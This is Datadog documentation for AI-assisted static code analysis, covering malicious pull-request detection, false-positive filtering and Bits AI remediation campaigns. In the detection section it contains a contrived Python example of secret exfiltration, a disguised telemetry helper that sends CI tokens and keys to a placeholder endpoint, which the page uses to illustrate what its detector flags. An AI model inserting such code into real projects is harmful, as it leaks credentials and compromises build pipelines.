AI-Enhanced Static Code Analysis
This product is not supported for your selected Datadog site.
Static Code Analysis (SAST) uses AI to help automate detection, validation, and remediation across the vulnerability management lifecycle.
This page provides an overview of these features.
Summary of AI features in SAST
| Step of vulnerability management lifecycle | Feature | Trigger Point | Impact |
|---|---|---|---|
| Detection | Malicious PR protection: Detect potentially malicious changes or suspicious diffs | At PR time | Flags PRs introducing novel risky code |
| Validation | False positive filtering: Deprioritize low-likelihood findings | After scan | Reduces noise, allowing focus on real issues |
| Remediation | Batched remediation: Generate suggested fixes (and optionally PRs) for one or multiple vulnerabilities | After scan | Reduces developer effort, accelerates fix cycle |
Detection
Join the Preview!
Malicious PR protection is in Preview and supports GitHub repositories only. Click Request Access and complete the form.
Malicious PR protection uses LLMs to detect and prevent malicious code changes at scale. It scans pull requests (PRs) submitted to the default branches of your repositories for potentially malicious intent, which helps you:
- Secure code changes from both internal and external contributors
- Scale your code reviews as the volume of AI-assisted code changes increases
- Embed code security into your security incident response workflows
Detection coverage
Malicious code changes come in many different forms. Datadog SAST covers attack vectors such as:
- Malicious code injection
- Attempted secret exfiltration
- Pushing of malicious packages
- CI workflow compromise
Examples include the tj-actions/changed-files breach (March 2025) and obfuscation of malicious code in npm packages (September 2025). Read more in the blog post here.
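For illustration, a contrived change of the kind this detection targets might add a seemingly routine helper that quietly exfiltrates CI secrets. Everything in the sketch below (the function name, the payload shape, and the URL) is invented for this example and is not taken from any real incident:
```python
# Contrived illustration of an "attempted secret exfiltration" pattern in a PR.
# None of this is real project code; the helper name and URL are placeholders.
import json
import os
import urllib.request


def report_build_status(status: str) -> None:
    """Looks like harmless build telemetry, but bundles CI secrets into the payload."""
    payload = {
        "status": status,
        # Quietly collects anything that looks like a token or key from the CI environment.
        "env": {k: v for k, v in os.environ.items() if "TOKEN" in k or "KEY" in k},
    }
    req = urllib.request.Request(
        "https://example.com/collect",  # attacker-controlled endpoint (placeholder)
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)  # sends the secrets on every CI run
```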
Search and filter results
Detections of potentially malicious PRs from Datadog SAST appear in Security Signals, generated by rule ID `def-000-wnp`.
Each scan produces one of two verdicts, malicious or benign. You can filter on them with `@malicious_pr_protection.scan.verdict:malicious` or `@malicious_pr_protection.scan.verdict:benign`.
Signals can be triaged directly in Datadog (assign, create a case, or declare an incident), or routed externally using Datadog Workflow Automation.
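If you prefer to pull these signals programmatically instead of triaging them in the UI, a minimal sketch using the Datadog v2 Security Monitoring signals API could look like the following. The query string is the verdict facet described above; the environment variable names and the seven-day window are arbitrary choices for this example:
```python
# Minimal sketch: list recent malicious-PR signals via the Datadog v2
# Security Monitoring signals API. Assumes DD_API_KEY and DD_APP_KEY are set.
import os
from datetime import datetime, timedelta, timezone

import requests

DD_SITE = os.environ.get("DD_SITE", "datadoghq.com")
now = datetime.now(timezone.utc)

resp = requests.get(
    f"https://api.{DD_SITE}/api/v2/security_monitoring/signals",
    params={
        # Same facet you would use in the Security Signals explorer.
        "filter[query]": "@malicious_pr_protection.scan.verdict:malicious",
        "filter[from]": (now - timedelta(days=7)).isoformat(),
        "filter[to]": now.isoformat(),
        "page[limit]": "25",
    },
    headers={
        "DD-API-KEY": os.environ["DD_API_KEY"],
        "DD-APPLICATION-KEY": os.environ["DD_APP_KEY"],
    },
    timeout=30,
)
resp.raise_for_status()

for signal in resp.json().get("data", []):
    attrs = signal.get("attributes", {})
    print(signal.get("id"), attrs.get("message", ""))
```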
Validation and triage
False positive filtering
For a subset of SAST vulnerabilities, Bits AI reviews the context of the finding, assesses whether it is more likely a true or false positive, and provides a short explanation of its reasoning.
To narrow down your initial triage list, on the Vulnerabilities page, select Filter out false positives. This option applies the `-bitsAssessment:"False Positive"` query.
Each finding includes a section with an explanation of the assessment. You can provide Bits AI with feedback on its assessment using a thumbs up 👍 or thumbs down 👎.
False positive filtering is supported for the following CWEs:
Remediation
Join the Preview!
AI-suggested remediation for SAST is powered by the Bits AI Dev Agent and is in Preview. To sign up, click Request Access and complete the form.
Datadog SAST uses the Bits AI Dev Agent to generate code fixes for vulnerabilities. You can remediate individual vulnerabilities or fix multiple vulnerabilities at once using bulk remediation campaigns.
To view and remediate vulnerabilities:
1. In Datadog, navigate to Security > Code Security > Vulnerabilities, and select Static Code (SAST) in the left sidebar.
2. Select a vulnerability to open a side panel with details about the finding and the affected code.
3. In the Next Steps > Remediation section, click Fix with Bits.
Single fix
Use Single fix to open a code session for Bits AI to fix this single vulnerability. You can review the proposed diff, ask follow-up questions, edit the patch, and create a pull request to apply the remediation to your source code repository.
Bulk fix (campaigns)
Use Bulk fix to create a remediation campaign that fixes multiple vulnerabilities at the same time.
Selecting this option opens the Create a new Bits AI Bulk Fix Campaign modal, where you can configure the following:
- Campaign title: A descriptive title for your campaign.
- Repositories: The repositories and paths you want Bits AI to scan.
- PR grouping options: How Bits AI should group findings into pull requests (for example, one PR per repository, file, or finding). You can also limit the number of open PRs and the number of findings per PR.
- Custom instructions (optional): Additional guidance for how Bits AI should generate fixes, such as changelog requirements or pull request title formatting.
After you create a campaign, Bits AI Dev Agent loads the in-scope findings, generates patches based on your grouping rules, and (if enabled) creates pull requests. You can review and edit each session before merging changes.
- Automatic PR creation is disabled by default. Enable it in Settings.
- Campaigns do not track fixes created outside the campaign. If you generate a single fix and later create a campaign, Bits AI may generate the same fix again.
View campaign progress
To view all campaigns, navigate to Bits AI > Dev Agent > Code Sessions > Campaigns.
Click a campaign to view details including session status, pull requests by repository, and remediated findings. You can click on individual sessions to review, edit, and merge fixes with the Bits AI Dev Agent.
Each code session shows the life cycle of an AI-generated fix so you can review and validate changes before merging. It includes:
- The original security finding and proposed code change
- An explanation of how and why the AI generated the fix
- CI results (if enabled) to validate the patch is safe to deploy
- Options to refine the fix or Create PR to apply the changes to your source code repository
To open the remediation session, select the vulnerability from the Vulnerabilities page to open the side panel, scroll to the Remediation section, and select Expand & Chat.
You can also navigate to remediation sessions through the Campaigns and Code Sessions views.
Further reading
Additional helpful documentation, links, and articles: